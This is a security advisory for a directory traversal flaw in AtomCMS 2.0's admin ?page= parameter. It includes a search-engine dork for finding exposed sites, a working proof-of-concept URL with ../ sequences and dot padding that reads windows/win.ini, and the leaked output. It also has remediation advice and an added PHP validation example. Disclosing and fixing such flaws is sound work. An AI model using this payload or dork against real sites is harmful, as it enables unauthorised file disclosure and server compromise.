Authored by indoushka

Atom CMS version 2.0 suffers from a directory traversal vulnerability.

====================================================================================================================================
| # Title : AtomCMS 2.0 Directory traversal Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |
| # Vendor : https://github.com/thedigicraft/atomCMS/ |
| # Dork : Welcome to AtomCMS 2.0 |
====================================================================================================================================

PoC:

[+] Dorking in Google or other search engine.

[+] Directory traversal :

Directory traversal is a vulnerability that allows attackers to access restricted directories and execute commands outside of the web server's root directory.

[+] Affected items :

/Atom/admin/
/Atom/admin/index.php

[+] The impact of this vulnerability :

By exploiting directory traversal vulnerabilities, attackers step outside the web root and access files in other directories.
As a result, attackers might view restricted files or execute commands, leading to a full compromise of the web server.

[+] How to fix this vulnerability :

The script should reject path metacharacters (such as "../") in user input instead of passing the value to the filesystem.

This vulnerability affects /Atom/admin/.
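As an added example (not AtomCMS code and not the author's), the following PHP shows one way to resolve a ?page= parameter safely: an allow-list on the characters and length of the page name, followed by a realpath() check that the resolved file is still inside the pages directory. It assumes, as a hypothetical layout, that admin pages are plain .php files under a pages/ directory next to the script; AtomCMS's real layout is not described in this advisory. Run from the command line it shows the advisory's payload (trailing dots shortened) being rejected before any file is touched.

```php
<?php
// Added example, not AtomCMS code. Assumed layout: admin pages are
// pages/<name>.php next to this script (hypothetical).
const PAGES_DIR = __DIR__ . '/pages';

/**
 * Map a user-supplied page name to a file inside PAGES_DIR.
 * Returns the resolved path, or null if the name is not an allowed page.
 */
function resolve_page(string $page): ?string
{
    // 1. Allow-list the character set and length. Slashes, dots, NUL bytes
    //    and percent signs cannot pass, so "../" sequences and the long
    //    trailing-dot padding seen in the advisory are refused here.
    if (!preg_match('/\A[a-z0-9_-]{1,64}\z/i', $page)) {
        return null;
    }

    // 2. Defence in depth: resolve the real path (follows symlinks) and
    //    confirm it is still under PAGES_DIR. realpath() returns false
    //    for a file that does not exist.
    $base      = realpath(PAGES_DIR);
    $candidate = realpath(PAGES_DIR . '/' . $page . '.php');
    if ($base === false || $candidate === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs for demonstration: the advisory's traversal
    // payload (dot padding shortened to 200) and an ordinary page name.
    $payload = 'unexisting/../../../../../../../../../../windows/win.ini'
             . str_repeat('.', 200);
    var_dump(resolve_page($payload));    // NULL: fails the allow-list
    var_dump(resolve_page('dashboard')); // path if pages/dashboard.php exists, else NULL
} else {
    // Web usage: only include a page that passed both checks.
    $file = resolve_page($_GET['page'] ?? 'dashboard');
    if ($file === null) {
        http_response_code(404);
        exit('Unknown page');
    }
    require $file;
}
```

The allow-list alone already stops the request shown in the attack details; the realpath() check is kept so that a symlink or a later change to the character rules cannot quietly reopen the hole.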

[+] Attack details :

URL encoded GET input page was set to unexisting/../../../../../../../../../../windows/win.ini..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
..................................................................................................................
File contents found:
; for 16-bit app support

[+] http://localhost/Atom/admin/?page=unexisting/../../../../../../../../../../windows/win.ini..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
..................................................................................................................


====Greetings to :=========================================================================================================================
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |
===========================================================================================================================================